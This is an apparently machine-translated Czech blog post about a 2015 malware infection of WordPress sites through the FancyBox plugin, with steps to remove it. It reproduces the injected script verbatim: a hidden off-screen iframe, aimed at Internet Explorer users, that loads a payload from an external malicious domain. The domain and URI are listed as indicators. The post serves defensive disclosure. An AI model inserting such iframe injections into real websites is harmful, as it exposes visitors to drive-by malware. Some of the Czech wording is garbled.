Dříve tento týden řada internetových stránek a blogů WordPress, obdržel varování od uživatele infekce malware přes Google Webmasters.
Problém, ke kterému Google Webmasters uvedené je přítomnost treska / skript iframe malware zdrojové webové stránky.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Zdá se, že se jedná o zranitelnost a pluginacquis FancyBox pro WordPress který až do včerejška (05.02.2015) nebyly aktualizovány na dlouhou dobu.
Řešení tohoto problému a dezinfekční viry weby s tímto malwarem, je poměrně jednoduché.
1. Zakažte plugin FancyBox.
2. Smazat všechny soubory pluginů FancyBox ze serveru (přes FTP)
3. Nainstalujte novou verzi pluginu (Fancybox 3.0.4)
FancyBox pro WordPress 3.0.4
- Přejmenováno nastavení ovlivněné bezpečnostním problémem uvedeným v 3.0.3. To by mělo zastavit zobrazování škodlivého kódu na stránkách, kde je plugin updated bez odstranění škodlivého kódu.
FancyBox pro WordPress 3.0.3
- Opraven problém se zabezpečením.
Informace o škodlivém softwaru:
TYP: Iframe přesměrování
TARGET: WordPress fancybox
Škodlivého softwaru DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW KÓDY:
PÍSEMNÝ PORUCHA: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Odstraňte malware ze svého WordPress webových stránkách .